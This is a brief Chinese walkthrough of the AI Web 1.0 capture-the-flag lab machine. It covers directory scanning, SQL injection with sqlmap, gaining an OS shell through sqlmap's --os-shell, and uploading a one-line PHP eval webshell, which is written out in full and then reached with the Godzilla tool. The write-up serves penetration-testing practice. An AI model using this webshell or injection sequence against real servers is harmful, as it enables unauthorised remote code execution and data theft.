AI Web 1.0 靶机攻略

1、启动靶机

2、打开御剑，扫描端口，得到AI Web 1.0靶机IP

3、扫描目录

4、检察192.168.253.128/robots.txt

5、进一步扫描
/m3diNf0/

6、检察192.168.253.128/m3diNf0/info.php

8、扫描se3reTdir777，发现index.php

9、开始抓包

10、将抓到的包放到2.txt中，使用sqlmap举行sql注入

得到库名

得到表名

得到列名

再看userName和password

11、由info.php得知绝对路径，以此运行--os-shell来远程访问
   python3 sqlmap.py -r 2.txt的路径 --os-shell
  12、输入绝对路径/home/www/html/web1x443290o2sdf92213/se3reTdir777/uplo
ads/

13、上传一句话木马
   echo "<?php @eval(\$_POST[cmd]);?>" >1.php
   14、用哥斯拉成功毗连到木马

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。